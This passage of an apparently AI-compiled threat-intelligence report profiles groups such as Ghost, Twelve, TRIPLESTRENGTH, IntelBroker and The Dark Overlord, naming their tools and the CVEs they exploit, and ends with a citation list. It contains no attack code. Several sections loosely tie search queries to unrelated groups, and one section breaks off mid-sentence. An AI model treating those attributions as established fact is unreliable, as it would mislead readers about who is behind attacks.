STAC5777 has been observed to overlap with a group previously identified by Microsoft as Storm-1811.27 STAC5143 is a newly reported threat cluster that appears to be copying the Storm-1811 playbook, with potential connections to well-known financially motivated groups such as FIN7, Sangria Tempest, or Carbon Spider.27 These activities demonstrate a focus on exploiting common enterprise communication and collaboration platforms for initial access and malware delivery.

Threat Actor: G_mic

G_mic is a cybercriminal operating on online forums, known for claiming and offering for sale large datasets allegedly stolen from major telecommunications companies.28

The primary motivation for G_mic’s activities is financial gain, achieved through the sale of stolen customer data on cybercrime forums.28

G_mic’s TTPs involve breaching company systems to exfiltrate sensitive customer information. In one notable instance, G_mic claimed to have breached Verizon and T-Mobile US, offering data purportedly belonging to 61 million Verizon customers (3.1 GB) and 55 million T-Mobile US customers.28 The data allegedly includes personal and contact details, updated for 2025, and was offered for sale in CSV and JSON formats.28 While specific technical details of G_mic’s breach methods are not provided, the nature of the data offered suggests successful access to customer databases.

The broader context of threat actors using generative AI tools like Gemini for operational support, including research, troubleshooting code, content generation, and vulnerability research, indicates a general trend of adversaries leveraging advanced technologies to enhance their capabilities.30 While not directly linked to G_mic, this illustrates the evolving landscape in which cybercriminals operate.

Threat Actor: APT26 / TRIPLESTRENGTH / IntelBroker / Twelve (Associated with Putra26 query)

The “Putra26” query in the provided material does not directly identify a specific threat actor by that name. However, the associated research snippets point to several distinct and significant threat actors and groups: APT26, TRIPLESTRENGTH, IntelBroker, and Twelve.

APT26 (aka BRONZE EXPRESS, JerseyMikes, TECHNETIUM, TURBINE PANDA, Taffeta Typhoon) is a Chinese cyber espionage group.31 Their motivation is state-sponsored espionage, focusing on stealing technology and sensitive information. They have been active against targets in East Asia, particularly Taiwan, and occasionally Japan and Hong Kong.32 Their campaigns have involved sophisticated tactics, including the use of PlugX malware and other tools.31

TRIPLESTRENGTH is a financially motivated threat actor that opportunistically targets cloud environments.33 Their objectives include illicit cryptocurrency mining (cryptojacking), ransomware deployment, and selling access to compromised cloud platforms (e.g., Google Cloud, AWS, Microsoft Azure, Linode, OVHCloud, Digital Ocean).33 Initial access is often gained through stolen credentials and cookies, some sourced from Raccoon information stealer infection logs.33 They abuse hijacked environments to create compute resources for mining and leverage highly privileged accounts to add attacker-controlled accounts as billing contacts.33 They have deployed RCRU64 ransomware, gaining initial access via RDP, performing lateral movement, and evading antivirus defenses.33

IntelBroker (aka Kai West, Kyle Northern) is a serial hacker and prominent data broker known for high-profile cyberattacks and selling exfiltrated data.34 IntelBroker is closely associated with the deep web hacking forum BreachForums, where the actor held a moderator role.34 Their motivation is financial gain through data sales. IntelBroker has been charged with causing millions of dollars in damages to victims, including Hewlett Packard Enterprise (HPE), Cisco, and Nokia, by stealing source code, private GitHub repositories, and certificates.34 The actor was reportedly arrested in France in February 2025.34

Twelve is a hacktivist group that emerged around April 2023, following the onset of the Russo-Ukrainian war.38 Their motivation is ideological, aiming to inflict maximum damage on Russian targets by crippling networks and disrupting business operations, rather than financial gain.38 They conduct hack-and-leak operations, exfiltrating sensitive information and sharing it on their Telegram channel.38 Twelve utilizes a range of publicly available tools, including Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation.38 They exploit known vulnerabilities in software like VMware vCenter (e.g., CVE-2021-21972, CVE-2021-22005) to deliver web shells and backdoors like FaceFish.38 They disguise malware and tasks under legitimate-sounding names to evade detection and have used versions of LockBit 3.0 ransomware.38 Overlaps have been identified between Twelve and another hacktivist group, BlackJack.38

Threat Actor: Ghost (DigitalGhost query)

The “DigitalGhost” query is associated with the threat actor known as Ghost, also identified by aliases such as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.39 This group is primarily based in China and is financially motivated.39

Ghost actors conduct widespread ransomware attacks for financial gain, targeting a diverse range of sectors, including critical infrastructure, schools, universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and small- and medium-sized businesses.39

Their TTPs for initial access involve exploiting publicly facing applications associated with multiple Common Vulnerabilities and Exposures (CVEs).39 They specifically target networks where available patches have not been applied, exploiting known vulnerabilities in Fortinet FortiOS appliances (CVE-2018-13379), Adobe ColdFusion (CVE-2010-2861, CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, commonly known as ProxyShell).39

Upon gaining access, Ghost actors upload web shells to compromised servers and leverage Windows Command Prompt and PowerShell to download and execute Cobalt Strike Beacon malware.39 While Cobalt Strike is a commercially available adversary simulation tool, Ghost actors use it maliciously.39 Persistence is not a major focus for Ghost, as they often move from initial compromise to ransomware deployment within the same day, though they have been observed creating new local and domain accounts or changing existing passwords.39 For privilege escalation, they rely on built-in Cobalt Strike functions to steal process tokens and use open-source tools like SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato.39 They also use Cobalt Strike’s “hashdump” or Mimikatz to collect passwords and hashes for unauthorized logins and lateral movement.39 Organizations that have identified and responded to the unusual commands, scripts, and programs run by Ghost actors have successfully prevented ransomware attacks.39

Threat Actor: RA GROUP / The Dark Overlord (Associated with BABAYO EROR SYSTEM query)

The “BABAYO EROR SYSTEM” query does not directly correspond to a known threat actor in the provided material. However, the associated research details two prominent cybercrime groups: RA GROUP and The Dark Overlord (TDO).

RA GROUP is a relatively new ransomware group that emerged online in April 2023.9 Their motivation is purely financial, focusing on ransomware and data exfiltration. RA GROUP leverages the leaked Babuk ransomware source code, which became publicly available in September 2021, demonstrating how leaked code can quickly enable new criminal operations.9

RA GROUP employs a double-extortion model, claiming to steal large volumes of data before encrypting systems.9 They use custom ransom notes that specify short payment deadlines (three days before a sample is published, seven days before the full dataset).9 Their targets have included companies in the insurance, financial services, and electronics industries in the U.S. and South Korea.9 The group’s website has undergone cosmetic changes, indicating they are in the early stages of their operation.9

The Dark Overlord (TDO) is an international hacker organization known for high-profile cybercrime extortion and public demands for ransom.40 Their primary motivation is financial gain, often through the sale of stolen confidential documents and medical records on dark web marketplaces.40

TDO gained notoriety through the sale of stolen medical records and later for extorting entities like Netflix (leaking unreleased episodes of “Orange Is the New Black”) and Disney.40 In 2017, they expanded into terror-based attacks, sending life-threatening text messages to students and parents in school districts, demanding payment to prevent harm.40 A significant incident involved the “9/11 Papers” hack in December 2018, where TDO threatened to release thousands of incriminating documents related to Lloyd’s of London and Silverstein Properties unless a $2,000,000 Bitcoin ransom was paid.40 TDO uses public platforms like Twitter and Pastebin to announce their hacks and demands, though they have faced bans from these platforms.40 A member, Nathan Wyatt, was arrested and sentenced in the U.S. for conspiracy to commit aggravated identity theft and computer fraud.40

Threat Actor: Anonymous / Black Maskers Army (Associated with Tunisian Maskers Cyber Force query)

The “Tunisian Maskers Cyber Force” query does not directly identify a specific threat actor in the provided material. However, the associated research describes the broader hacktivist collective Anonymous and the specific group Black Maskers Army, both of which have relevance to the context of hacktivism and regional cyber activities.

Anonymous is a decentralized international activist and hacktivist collective known for various cyberattacks against governments, institutions, corporations, and other entities.41 Their motivations are primarily ideological, opposing internet censorship and control, and supporting movements like the Arab Spring and Occupy.41 They aim to draw public attention to

Works cited

  1. Threat actor | Flashpoint, accessed July 5, 2025, https://flashpoint.io/intelligence-101/threat-actor/
  2. What is a Cyber Threat Actor? | CrowdStrike, accessed July 5, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
  3. Threat Actors: Common Types & Best Defenses Against Them | Splunk, accessed July 5, 2025, https://www.splunk.com/en_us/blog/learn/threat-actors.html
  4. An introduction to the cyber threat environment – Canadian Centre for Cyber Security, accessed July 5, 2025, https://www.cyber.gc.ca/en/guidance/introduction-cyber-threat-environment
  5. TA829 and UNK_GreenSec Share Tactics and Infrastructure in Ongoing Malware Campaigns – The Hacker News, accessed July 5, 2025, https://thehackernews.com/2025/07/ta829-and-unkgreensec-share-tactics-and.html
  6. Proofpoint links TA829 & UNK_GreenSec in cybercrime overlap – Security Brief UK, accessed July 5, 2025, https://securitybrief.co.uk/story/proofpoint-links-ta829-unk_greensec-in-cybercrime-overlap
  7. Cybercrime: A Multifaceted National Security Threat | Google Cloud Blog, accessed July 5, 2025, https://cloud.google.com/blog/topics/threat-intelligence/cybercrime-multifaceted-national-security-threat
  8. Threat Actor Spotlight: Pryx – Morado Intelligence, accessed July 5, 2025, https://www.morado.io/blog-posts/threat-actor-spotlight-pryx
  9. Ransomware group claims 2.5 terabytes of stolen data less than a month after emerging online | CyberScoop, accessed July 5, 2025, https://cyberscoop.com/ransomware-group-ra-group-talos/
  10. Dark Web Profile: BlackCat (ALPHV) – SOCRadar® Cyber Intelligence Inc., accessed July 5, 2025, https://socradar.io/dark-web-profile-blackcat-alphv/
  11. black-basta-threat-profile.pdf – HHS.gov, accessed July 5, 2025, https://www.hhs.gov/sites/default/files/black-basta-threat-profile.pdf
  12. How Microsoft names threat actors – Unified security operations, accessed July 5, 2025, https://learn.microsoft.com/en-us/unified-secops-platform/microsoft-threat-actor-naming
  13. Uber Hack – A Deeper Dive – Singapore – InsiderSecurity, accessed July 5, 2025, https://insidersecurity.co/uber-hack-a-deeper-dive/
  14. Lapsus$ – Wikipedia, accessed July 5, 2025, https://en.wikipedia.org/wiki/Lapsus$
  15. Uber Cybersecurity Incident: Which Logs Do IR Teams Need to Focus On? – Mitiga, accessed July 5, 2025, https://www.mitiga.io/blog/uber-cybersecurity-incident-which-logs-do-ir-teams-need-to-focus-on
  16. Magecart threat actor rolls out convincing modal forms – Malwarebytes, accessed July 5, 2025, https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art
  17. What Is Magecart | Attack Examples & Prevention Techniques – Imperva, accessed July 5, 2025, https://www.imperva.com/learn/application-security/magecart/
  18. Magecart Attacks: Prevention Tips and Security Best Practices – Kroll, accessed July 5, 2025, https://www.kroll.com/en/insights/publications/cyber/monitor/what-is-magecart-malware-how-to-protect-against-it
  19. Iran-Based Threat Actor Exploits VPN Vulnerabilities | CISA, accessed July 5, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a
  20. New Xanthorox AI Threat Puts MSSPs, MPS, and Security Teams on Notice | MSSP Alert, accessed July 5, 2025, https://www.msspalert.com/news/new-xanthorox-ai-threat-puts-mssps-mps-and-security-teams-on-notice
  21. DustSquad, Golden Falcon – Threat Group Cards: A Threat Actor Encyclopedia, accessed July 5, 2025, https://apt.etda.or.th/cgi-bin/showcard.cgi?g=DustSquad%2C%20Golden%20Falcon
  22. Hacktivist Group: Team Insane PK – Radware, accessed July 5, 2025, https://www.radware.com/cyberpedia/ddos-attacks/hacktivist-group-team-insane-pk/
  23. U.S. Agencies Warn of Rising Iranian Cyber Attacks on Defense, OT Networks, and Critical Infrastructure – The Hacker News, accessed July 5, 2025, https://thehackernews.com/2025/06/us-agencies-warn-of-rising-iranian.html
  24. Part 1: The Iran-Israel Cyber Standoff – The Hacktivist Front | CloudSEK, accessed July 5, 2025, https://www.cloudsek.com/blog/part-1-the-iran-israel-cyber-standoff—the-hacktivist-front
  25. DarkEngine: CyberCX Uncovers Highly Orchestrated WordPress Phishing Campaign, accessed July 5, 2025, https://cybercx.com.au/blog/dark-engine/
  26. WIP26 Espionage | Threat Actors Abuse Cloud Infrastructure in Targeted Telco Attacks, accessed July 5, 2025, https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/
  27. Sophos MDR tracks two ransomware campaigns using “email bombing,” Microsoft Teams “vishing”, accessed July 5, 2025, https://news.sophos.com/en-us/2025/01/21/sophos-mdr-tracks-two-ransomware-campaigns-using-email-bombing-microsoft-teams-vishing/
  28. Verizon and T-Mobile Deny Data Breaches as Millions of User Records Sold Online, accessed July 5, 2025, https://hackread.com/verizon-t-mobile-deny-data-breaches-user-records-sold/
  29. Alleged Verizon Data Breach: 61 Million Customer Records Offered for Sale – Reddit, accessed July 5, 2025, https://www.reddit.com/r/cybersecurity/comments/1lpzj7c/alleged_verizon_data_breach_61_million_customer/
  30. Adversarial Misuse of Generative AI | Google Cloud Blog, accessed July 5, 2025, https://cloud.google.com/blog/topics/threat-intelligence/adversarial-misuse-generative-ai
  31. APT26 (Threat Actor) – Malpedia, accessed July 5, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/apt26
  32. BlackTech (Threat Actor) – Malpedia, accessed July 5, 2025, https://malpedia.caad.fkie.fraunhofer.de/actor/blacktech
  33. TRIPLESTRENGTH Hits Cloud for Cryptojacking, On-Premises Systems for Ransomware, accessed July 5, 2025, https://thehackernews.com/2025/01/triplestrength-targets-cloud-platforms.html
  34. Flash Report: Prominent Threat Actors Reportedly Arrested – ZeroFox, accessed July 5, 2025, https://www.zerofox.com/intelligence/flash-report-prominent-threat-actors-reportedly-arrested/
  35. The FBI thinks it’s nailed the notorious ‘IntelBroker’ threat actor | IT Pro – ITPro, accessed July 5, 2025, https://www.itpro.com/security/cyber-crime/the-fbi-thinks-its-nailed-the-notorious-intelbroker-threat-actor
  36. Southern District of New York | Serial Hacker “IntelBroker” Charged For Causing $25 Million In Damages To Victims | United States Department of Justice, accessed July 5, 2025, https://www.justice.gov/usao-sdny/pr/serial-hacker-intelbroker-charged-causing-25-million-damages-victims
  37. Global Crackdown Leads to BreachForums Arrest – Searchlight Cyber, accessed July 5, 2025, https://slcyber.io/blog/global-crackdown-leads-to-breachforums-arrest/
  38. Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks, accessed July 5, 2025, https://thehackernews.com/2024/09/hacktivist-group-twelve-targets-russian.html
  39. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed July 5, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
  40. The Dark Overlord (hacker group) – Wikipedia, accessed July 5, 2025, https://en.wikipedia.org/wiki/The_Dark_Overlord_(hacker_group)
  41. Anonymous (hacker group) – Wikipedia, accessed July 5, 2025, https://en.wikipedia.org/wiki/Anonymous_(hacker_group)

Related Posts